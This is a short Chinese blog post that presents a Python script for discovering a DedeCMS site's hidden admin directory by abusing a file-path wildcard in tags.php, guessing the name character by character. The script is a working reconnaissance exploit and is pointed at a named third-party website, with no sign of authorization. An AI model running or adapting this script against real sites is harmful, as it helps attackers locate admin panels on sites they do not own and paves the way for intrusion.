Menu

DEDECMS找后台目录

2018-03-06 - Dedecms, 渗透测试

阿里的先知社区写了一篇dedecms找后台目录的文章

并且给出了一个php版本的 传送门

原理和废话我不多说了

我直接上一个python版本

随便找一个dede的站来实验一下 http://www.hzxxgc.com/ 网站自己修改。

上代码:

##!/usr/bin/env python
# coding:utf-8

import requests
import time

characters = “abcdefghijklmnopqrstuvwxyz0123456789_!#”
prefix = “”
url = “http://www.hzxxgc.com/tags.php”
data = {
“_FILES[mochazz][tmp_name]”: “./{p}<</images/adminico.gif”,
“_FILES[mochazz][name]”: 0,
“_FILES[mochazz][size]”: 0,
“_FILES[mochazz][type]”: “image/gif”
}

char_num = len(characters)

def post():
for i in range(char_num – 1):
global prefix
chs = prefix + characters[i]
global data
data[“_FILES[mochazz][tmp_name]”] = “./” + chs + “</images/adminico.gif”
r = requests.post(url, data=data)
time.sleep(0.5)
if “Upload filetype not allow !” not in r.text and r.status_code == 200:
prefix += characters[i]
print(“prefix: “, prefix)
post()

post()

 

 

运行效果图